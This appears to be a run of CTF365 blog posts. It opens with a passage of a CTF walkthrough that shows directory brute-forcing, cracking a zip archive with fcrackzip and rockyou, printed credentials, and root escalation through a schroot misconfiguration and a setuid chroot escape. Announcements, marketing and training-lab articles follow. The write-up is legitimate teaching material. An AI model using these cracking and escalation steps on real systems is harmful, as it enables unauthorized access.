Moving forward, there are a couple of viable methods that we can use. They both take about the same amount of time.

First method: read the source code of the index, then go to the directory indicated by the served image:

The second method is to use DirBuster with a directory list like /usr/share/dirbuster/wordlists/directory-list-1.0.txt. It should quickly log interesting information such as:

dirbuster
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: /cgi-bin/ - 403
Dir found: / - 200
Dir found: /i-can-has/ - 200
File found: /i-can-has/credentials.zip - 200
Dir found: /icons/ - 403

Anyway, the result is the same:

From here, getting something useful will take some time, but it isn't impossible:

wget http://10.200.0.6/i-can-has/credentials.zip
--2014-08-13 13:59:51-- http://10.200.0.6/i-can-has/credentials.zip
Connecting to 10.200.0.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 248 [application/zip]
Saving to: `credentials.zip’

100%[=============================================================>] 248 –.-K/s in 0s

2014-08-13 13:59:51 (31.7 MB/s) – `credentials.zip’ saved [248/248]

unzip credentials.zip
Archive: credentials.zip
[credentials.zip] credentials.txt password:
skipping: credentials.txt incorrect password

fcrackzip –dictionary –use-unzip –init-password /usr/share/wordlists/rockyou.txt credentials.zip

PASSWORD FOUND!!!!: pw == arisha786

unzip credentials.zip
Archive: credentials.zip
[credentials.zip] credentials.txt password:
extracting: credentials.txt

cat credentials.txt
foobar:r+:/,3{0WU<5%”OxDa=c=E)7%JMI35″R

This challenge also tries to prove a point about using a weak password to protect your password vault.

With this new information, getting a foothold is easy:

However, moving on from this point may not be so easy. Some of you tried to hit the machine with every exploit that’s even remotely close to what the machine is actually running. Some of you even used 32-bit exploits, even though the machine runs a 64-bit build.

During the competition I gave you an important hint: stop doing what you’re doing and start enumerating. Those who listened, moved to the next step.

Here’s what most of you missed on a fully patched machine: the binaries with the setuid attribute.

This enumeration shows a couple of important bits: the presence of /usr/bin/schroot and the presence of another userland in /srv/buildd. A little bit of RTFM on schroot (man schroot, man schroot.conf) reveals the next clue:

cat /etc/schroot/schroot.conf
[buildd]
description=buildd
aliases=buildd
type=directory
directory=/srv/buildd
root-groups=foobar
personality=linux

The interesting line from the above config file is: root-groups=foobar. The manual explains why:

root-users=user1,user2,…
A comma-separated list of users which are allowed password-less root access to the
chroot. If empty or omitted, no users will be allowed root access without a pass‐
word (but if a user or a group they belong to is in users or groups, respectively,
they may gain access with a password). See the section “Security” below.

You just need to read the help of schroot to figure out that the minimum set of options for getting into the chroot as root is: schroot -u root -c buildd.

The challenge isn’t over yet, as you need to escape the chroot. The easiest method is to set the setuid attribute to a binary owned by root inside the chroot, then execute that binary from the host machine:

As the userland from inside the chroot is 32-bit while the host is 64-bit, you need to copy the binary from the host to a location which is available to the chroot.

You can pwn a chroot the hard way by doing a chroot evasion. I am leaving this part as homework. Doing a file transfer or editing files from inside the chroot isn’t covered by the usual suspects, so you might learn something new if you try this.

First, I’d like to apologise for the long wait. If there’s someone to blame, than that’s me. Unfortunately, some things wont go as planned.

The winners are as follows:

1st Place – Team dcua with 26618.2 points

2nd Place – Team L0lzSecta (lm456nwifn’s one man army) with 32863.6 points

3rd Place – _JogiT4_ (single player) with 35895.3 points

The points are a function of time: t1 * w1 + t2 * w2. The lowest score wins.

• t1 = number of seconds needed for sending the ctf02-01 superuser flag
• w1 = the weight coefficient for t1, in this case 0.7 as the machine had much lower difficulty than ctf02-02
• t2 = number of seconds needed for sending the ctf02-02 superuser flag
• w2 = the weight coefficient for t2, in this case 0.3

The users without team (like _JogiT4_) were considered as being part of a team with the same name as the username in order to simplify the filtering of the submission table. Only the first submitted flag for a team was considered relevant. The duplicate submissions from the same team were dropped.

The reference timestamp is 2014-07-26 15:00:00 UTC aka the start of the competition. The full submission table, after removing the duplicates:

 * DNF (Did Not Finished)

We all love CTFs competitions because it is challenging, fun, improve your hacking skills and bond new friendships. After First Blood and Double Kill, we proudly announce Hattrick.

Format: Team Based

Starting Date: October 17 2014 15:00 UTC

Ending Date: October 19 2014 15:00 UTC

Rules: Yet to come

Hattrick will be special because will be Windows based  and include cryptography, MitM (man in the middle) etc.

The Prizes:

First Place:

One year CTF365 Premium Access (because you love to train your skills)

Second Place:

6 Months CTF365 Premium Access (because you love to train your skills)

Third Place:

3 Months CTF365 Premium Access (because you love to train your skills)

More surprise prizes yet to come. 

Prepare your PenTest tools, tell your friends, challenge your enemies and get ready for the competition.

In order to participate, all you have to do is to register at CTF365

This article is for security professionals and system administrators who work for SMEs (Small and Medium Enterprises) and corporations. It’s also for security department/team leaders, system administration department/team leaders, CISOs, CSOs, CIOs, CTOs, and CEOs.

With so many enterprises being breached by hackers lately, it’s clear that SMEs and corporations need to find more effective information security training solutions for their employees. With the help of specially designed security testing and training labs, this is something that can be easily achieved.

At CTF365, our goal is to provide an information security training platform that simulates the real-world Internet and allows users to convert theoretical knowledge into practical training. Through this approach, security professionals, system administrators, and web developers are able to complete training and testing exercises in an environment that is made up of real servers controlled by real users.

To maintain the integrity of CTF365’s focus on practical training, users are not allowed to host vulnerable-by-design servers in the Main Arena. This means, if you locate a vulnerability within the Main Arena, it’s an unintentional vulnerability. This is the real value and beauty of CTF365.

7 months ago, we launched CTF365’s Bronze account for individual security professionals and students. Today, we are proud to announce that we’re open for business to SMEs and corporations.

Silver Account: Used for offensive and defensive security training, testing new tools, experimenting with new tactics, traffic analysis, and engaging in other exercises that are typically forbidden on the real-world Internet.

Gold Account: Used like Silver account but comes with additional features, such as:

• Team Activity Report – a feature that helps team leaders monitor their team’s performance.
• Monitored Services – a feature that is designed to notify you of interrupted services and help keep your setup operational without the need to be connected to CTF365 24/7.

Who CTF365 is for (but not limited to):

• Security Training Companies – educational, continuous training, learning, and improvement
• InfoSec Vendors (Cisco, McAfee, Rapid7, etc.) – product testing through gamification and crowdsourcing
• InfoSec Organizations (OWASP, ENISA, etc.) – improving and increasing Internet security awareness
• InfoSec Conferences – entertaining, challenging, and community driven
• Security Management Companies – continuous training and improvement
• Red, Blue, CERT/CSIRT Teams
• Information Security Recruiters
• CS Faculties – educational, challenging, and hands-on
• Web Development Companies – improving and training for defensive security
• Web Hosting Companies – defensive security training
• Data Centres

At this moment, there are more than 100 servers and 250 web applications in the Main Arena.

Because of its flexibility, CTF365 can be connected to your existing core training capabilities as an add-on layer or it can be used as a standalone solution to improve your organization’s core security training capabilities.

CTF365 is not just another simple penetration testing lab; it’s a living, dynamic information security environment with real users (19,500+ and counting) and real servers. This is the beginning of a great journey, and we’re committed to add great features and functionalities in time to make sure that CTF365 will become the first choice for information security training, learning, and improving.

Any questions? Glad to answer.

About CTF365:  CTF365 it’s a top notch Security Training Platform for IT industry with a focus on Security Professionals, System Administrators and Web Developers that offers five stars services regarding training, learning and improving offensive and defensive web and network security.

The concept that drives CTF365 was inspired by the Internet, guided by capture the flag (CTF) competitions, and specially crafted for the ITC industry. CTF365 provides a platform where users and teams can train and improve their offensive and defensive security skills.

At CTF365, our goal is to provide a security training platform that simulates the real-world Internet. Through this approach, we’re able to provide security professionals, system administrators, and students with a place where they can convert theoretical knowledge into practical training. In addition, web developers can leverage CTF365’s user base to help discover vulnerabilities in their web applications. This helps web developers write security conscious code and produce safer web applications.

Why It Rocks:

Free Access to “Vulnerable by Design – In The Cloud”

“We believe that entry level resources should be open and free of charge for anyone who wants to dive into the InfoSec industry. Through this, we think we can make the Internet a little bit safer.”

CTF365’s Basic account holders receive free access to some of the most popular vulnerable-by-design servers and web applications available. This includes Metasploitable2 from Rapid7/Metasploit, bWAPP from Malik Mesellem, HacmeBank and HacmeCasino from McAfee/FoundStone. In the future, we’ll be adding more goodies designed for security newcomers.

By adding these components to our free penetration testing lab, we want to help security newcomers and ethical hacking beginners find their way into the security industry as qualified security professionals.

Also, because we were accepted into the Microsoft BizSpark startup program, CTF365 members can now train with Windows Server 2008 and Windows XP for FREE. These are the same operating systems that HacmeBank and HacmeCasino are deployed on.

If you’re an InfoSec instructor or teacher, feel free to use these applications in the cloud to create webcasts and teach your students. We also encourage screencasters to create video tutorials with them. All we ask is that you don’t forget to share your creations and experiences with us. We’d love to hear about them.

CTF365 Helps Open Source Projects to improve their Security:

When open source projects are in scope, CTF365 can be used as a web testing platform to help find security issues. We’ve already made it public and invited all Open Source founders to use it. You can read the announcement HERE.

Improving InfoSec Trainings Core Capabilities for Companies/Organizations

Today’s penetration/testing labs are used for many reasons. Trainers use them to teach information security to students, security software companies use them to provide product training to customers, security professionals use them to test new tools and tactics, and system administrators use them to practice defensive security. The list goes on but, ultimately, it’s evident that penetration testing labs play an important role in security education and training.

By adding CTF365 as a layer to your penetration testing lab, you’ll provide your users with an experience that is more engaging and entertaining. Also, because of its continuous user presence and constantly changing environment, CTF365’s design is more dynamic than conventional penetration testing labs.

Flexibility:

We’ve created a flexible infrastructure that allows users to create their own infrastructure. CTF365’s platform flexibility also allows users to connect their existing infrastructure whenever and wherever needed.

Who CTF365 is for (but not limited to):

• Security Training Companies – educational, continuous training, learning, and improvement
• InfoSec Vendors (Cisco, McAfee, Rapid7, etc.) – product testing through gamification and crowdsourcing
• InfoSec Organizations (OWASP, ENISA, etc.) – improving and increasing Internet security awareness
• InfoSec Conferences – entertaining, challenging, and community driven
• Security Management Companies – continuous training and improvement
• Red, Blue, CERT/CSIRT Teams
• Information Security Recruiters
• CS Faculties – educational, challenging, and hands-on
• Web Development Companies – improving and training for defensive security
• Web Hosting Companies – defensive security training
• Data Centres

Two Years Startup Journey:

In November 2012 we made our first announcement about CTF365. It’s been two amazing years of dedication and development, disappointment and excitement, and fails and achievements. Best bumpy ride ever. Aside from a great team and our determination to do the right thing, one thing stood out – The InfoSec Community.

On behalf of the CTF365 Team, I’d like to thank all of the community members who trusted and supported us. Thanks to those of you who didn’t trust us but supported us anyways. And thanks to those of you who bullied us. You drove us and made us committed to success. Thank you all.

About CTF365: CTF365 it’s a top notch Security Training Platform for IT industry with a focus on Security Professionals, System Administrators and Web Developers that offers five stars services. The Platform implements CTF concepts and leverages gamification mechanics to improve retention rates and speed up learning/training curves when it comes to Information Security.

Over the last 6 months, we’ve seen several large companies develop and launch their own “cyber attack map.” So we decided to curate a list of the most popular maps for your convenience. If you’re aware of another map, please tell us about it so we can add it.

Attack Maps

Deutsche Telekom  Sicherheitstacho.eu

Google Ideas + Arbor Networks  Digital Attack Map

Honey Project  HoneyMap

Norse Corporation  Norse – IPViking Live

Kaspersky  Find out where you are on the Cyberthreat map

FireEye  Cyber Threat Map

Some of these maps are so intricate that they appear to be organic, whereas the other maps are relatively simplistic. All of these maps, however, state that they allow you to monitor cyber attacks in real time. Live cyber attack observation is pretty cool, and it also makes for a nice marketing tool.

At CTF365, we think real time cyber attack maps are awesome. So we decided to build one of our own. When we started working on our map, we focused on two elements: user experience and information accessibility. By positioning these elements at the foundation of our map, we were able to create a close to real time cyber attack monitoring system that is engaging, interactive, and insightful. It’s more than a map; it’s a window into the core of the CTF365 security training platform.

Today we present our Interactive Cyber Attack Map.

Interfacing with the map is as easy as pointing and clicking. Through the various interactive components, users can identify active attackers, discover fortresses, and more. By measuring attacks on a visible surface, we’ve made it effortless for users to monitor the status of their fortresses and trace attacks back to the perpetrators. In a sense, the map is a less complex alternative to Nmap and IDS and the awesomeness is that users and CTF365 unregistered visitors can watch how attacks occurs.

The map is currently in its infancy and, therefore, is still being developed. New features will be added in the near future. Upon completion, the map will act as a comprehensive real time cyber attack monitoring system. If you’re looking to gain a new perspective on CTF365, the map is a great place to start.

You can access the map HERE.

About: CTF365 it’s a top notch Security Training Platform for the IT industry with a focus on Security Professionals, System Administrators and Web Developers that offers five stars services.

In 2014, several financial institutions and other large corporations — including Sony, Target, J.P. Morgan, Ebay and Home Depot — were hacked. These incidents prove that security breeches are not discriminative, and show that security weaknesses can lead to significant damages. Information Security is a $79.9 billion market and is expected to create a demand for 4.9 million professionals by 2017. This, and a 34% increase in security education and training, ranks Information Security Professional among the hottest jobs.

Because I receive so many questions regarding security and ethical hacking education for beginners, I curated a short but comprehensive list of free resources. This article is for those of you who need a starting point and some direction towards becoming an information security professional. Based on my experience, the resources mentioned below provide a useful starting point; however, they aren’t the only high quality resources out there, so feel free to share and comment.

If you’re a programmer or a system administrator, transitioning to a role in security will be much easier. A programming background inherently strengthens your ability to understand security tools, concepts, and common practices. A background in system administration will allow you to effectively build on your existing knowledge of network infrastructure and Internet protocols, and help you to better understand defensive strategies at the network layer.

If you don’t have a technical background, there’s no need to panic. You can still work towards a career in security. “Every security professional was a skiddie at the beginning” — a saying reminding us that we all started somewhere. Like anything else, security is a skill that is developed through hard work and dedication.

Finding Tools and Building Your Arsenal

Open source security auditing and penetration testing applications are your most valuable assets. When you need to find security tools, Google is your best friend; however, you can start here at SecTools. You can also find lots of open source tools on Github.

Check out these survey results to find out which tools others are using.

Setting up Your Training Environment

When practicing offensive and defensive security, never use your primary operating system. Instead, use a virtual machine. There are a number of desktop virtualization solutions available but we recommend Oracle’s VirtualBox because it’s free and cross-platform compatible.

The following video will show you how to create a Kali Linux virtual machine in VirtualBox:

Choosing Your Test Targets:

To practice offensive security, you need a target. There are a plenty of “Vulnerable by Design” machines out there but we recommend Metasploitable and HacmeBank. Metasploitable is Linux-based whereas HackmeBank is Windows-based.

If you have a Free Account on CTF365, you can access Metasploitable in the cloud to train your hacking skills. The advantage is that you don’t need to create a virtual machine or make configurations — we do everything for you. Another advantage is that, because it’s online, it simulates an authentic target and gives you a real life feel. Alternatively, you can find a variety of “Vulnerable by Design” machines at VulnHub.

The Book:

There are hundreds of security books, and some of them are even free; however, we recommend one book in particular to begin with — Metasploitable Unleashed. We recommend Metasploitable Unleashed because:

• It’s written and published by one of the best, well known security training companies — Offensive Security.
• It combines reading with practical experience and uses Metasploitable as a training lab.

Video Tutorials:

Chris Haralson’s YouTube channel is one of the best sources of high quality security training video tutorials. We recommend Chris’ channel because his videos are:

• Clear, concise and well organized.
• Detail oriented and noob proof.
• 7 minutes in length average.
• Reliable and accurate.

Chris created the following Metasploitable tutorial for CTF365 users:

About: CTF365 it’s a top notch Security Training Platform for the IT industry with a focus on Security Professionals, System Administrators and Web Developers that offers five stars services.

1. What the problems with their security training labs are?
2. How would a perfect security training lab look like?

Some of the answers were more product-centered, others were more general, but the ideas and vision are pretty clear.

Problems with actual security training labs:

The perfect Security Training Lab:

Here is what people are looking for in a training lab environment:

• An instance of Kali.
• An instance of Metasploitable2
• An instance or RHEL with common vulns (Vulnerable Apache/Tomcat/Java-RMI)
• A local SMTP mail relay with web-based mail client for social engineering campaigns
• A Windows Domain Controller (W2k8)
• A Windows 2k8 SQL Server with common SQL vulns (for example, blank sa password and MSSQL xp_cmdshell)
• A Windows 7 Client unpatched and with vulnerable apps (Java, Adobe Reader, Flash, Browsers, etc)
• A Windows 8 Client unpatched and with vulnerable apps (Java, Adobe Reader, Flash, Browsers, etc)

In addition to the above, these systems would need to be configured in a way that allows the student to exercise the following functionalities:

• Remote exploits
• Local exploits
• Brute force password attacks
• Credentials domino meta-module
• Pass-the-hash
• Social Engineering campaign (i.e. Setup a campaign, relay a phishing email through the local smtp gateway, log into a client and retrieve the email and get pwned)

Tiered network environment where we can leverage Proxy and VPN pivoting, that would be awesome.

This should be representative of real world issues in real world environments.

• A diversity of operating systems would also be nice. For instance, it would be a “nice to have” to have a vulnerable SPARC Solaris system to be able to demonstrate what a buffer overflow on SPARC looks like.
• There should be a nice number of systems active (let’s say 40 or more), with a diverse set of technologies and vulnerabilities. The reason would be to not have dull vulnerability scan results, but also to be able to teach students on common vulnerabilities.
• Another feature could be a network that is not completely flat, so that mapping out networks can be looked at. And it would also be cool to have hosts that can only be reached/attacked through pivoting via a vulnerable host for example.
• I’ve also been thinking about a lab in which it’s possible to do traffic redirection attacks (eg. ARP spoofing), to enable testing of MITM attacks (eg. RDP MITM).
• Another nice to have would be a system on which a vulnerability is present that makes a service crash when vulnerability scanned or when exploitation is attempted. The service should then restart automatically after a few minutes. This would be nice to show the dangers of scanning/pentesting.
• What would also be nice is that if there’s a vulnerable server to attack during a course, it would be best if every student has his own target to attack, because a system might become unstable after an exploit and if there’s 10 people bashing on the same vulnerability in parallel… so there should be a flexible way to configure a lab instance for a number of people.
• But most of all: it should be stable and reliable. Nothing is worse than to have to give a course and hosts are going down, network is slow, connectivity is lost, etc. …

I know it’s a lot to ask and not all that simple, but you asked what I’m dreaming

Building Next Generation of Information Security Training Labs:

Because of the increasing complexity of the software, internet size (IoE – Internet of Everything) and types of attacks, information security trainings demand new standards over security training labs and the answers above prove that there is a need for better, sophisticated and close to real world security training labs. If you really want to learn and train over information security at a higher level, USB/CD delivery training labs are out of the question nowadays. USB/CD security labs are for entry level security professionals wannabes and there are plenty of free great resources.

 

Based on our experience at CTF365, there are some very important factors that you have to keep in mind, when designing the next generation of information security training labs whether you’re a software/hardware security vendor, security training company, or any information security organization related:

Availability

• Every student gets his/her own security training lab. This way you’ll avoid system alteration and the student will get what he paid for.
• Redundancy – In case of IP failure or hardware failure.

Diversity

• As many operating systems as possible, with a lot of applications and web applications.

Complexity

• Tiered networks, traffic automation over smtp, ftp services etc. to mimic the real world.

Automation

• Easy and fast deploy (e.g. three clicks and 2-3 minutes), easy to manage (create/delete/restart labs or VMs within the labs in minutes) and full monitoring.

Flexibility

• Different modules for different trainings.

Building such a security training lab takes time, a lot of man-hours, a clear vision over its architecture and most importantly, the willingness to have it done for your customers. Awesome security training labs are important from a marketing and brand recognition point of view as well. You might have a great product that customers want (or “must have”) but if you don’t offer them proper training to use your product at its full capacity it will be a great loss in the long run.

About: CTF365 it’s a top notch Security Training Platform for the IT industry with a focus on Security Professionals, System Administrators and Web Developers that offers five stars services.

The Platform implements CTF concepts and leverages gamification mechanics to improve retention rates and speed up the learning/training curve.

This article is intended for information security trainers and training service managers that work in the Information Security Industry.

In a recent article I explained the necessity for and requirements needed to build the next generation of security training labs. I argued that it is important to improve security training labs and made a list of things to keep in mind when building such labs. You can read the article HERE.

The Problem:

If you’re an information security trainer that provides online trainings via VPN/VNC, chances are that you’ve heard students complain about:

The lab server/service that I try to reach is down/doesn’t work

The connection to the lab is way too slow

The OSes, web applications/frameworks within the security training lab are obsolete

Are there more servers/services other than those?

… And, if you’re a training service manager, you’ve heard your trainer colleagues complaining about students’ complaints and trying to figuring out a way to fix these issues.

No one likes complaints but listening to them and taking action is gold if we want to improve, become better at, and most important, have happy customers.

Having state of the art security training labs for your students/customers is difficult because of the increasing number of new vulnerabilities (adding them to your lab), new OS versions or obsolete OSses (e.g. WindowsXP). Also, keeping such training labs up to date is costly and requires a lot of man hours. Not to mention the time spent for designing, testing and deploying it.

At CTF365 we’ve developed a platform that takes this pain out of your organization. We made sure it is cost effective, easy to deploy and easy to use.

Creating a Lab:

Very easy to deploy: Add a name, select a template (you can get as many templates as you need) and push “Create”.

Adding Students:

As an instructor you have full control over the labs and each of your students will get his/her own lab to train in. You’ll be able to add, delete, create and re-create machines, configure networks, routers and switches.

Your students will have control over their own labs being able to delete/restart and recreate each machine or his entire lab if broken. All these with just a few clicks.

Connecting via VNC or VPN

Information security trainings demand new standards over security training labs. Offering sophisticated, well designed and reliable security training labs to your students/customers is not a luxury anymore, it has become a necessity for better trainings. That’s because of the increasing complexity of the software and types of attacks as well.

Security Training Labs on Demand can be fully customized with different operating systems, setups, frameworks and can be delivered as white label (on your company’s site). The platform will lower your costs, improve student’s training experience and transform your trainings into a pleasant experience.

If you want to try it, just fill in the form to request a demo.

About: CTF365 is a top notch Security Training Platform for the IT industry with a focus on Security Professionals, System Administrators and Web Developers that offers five stars services.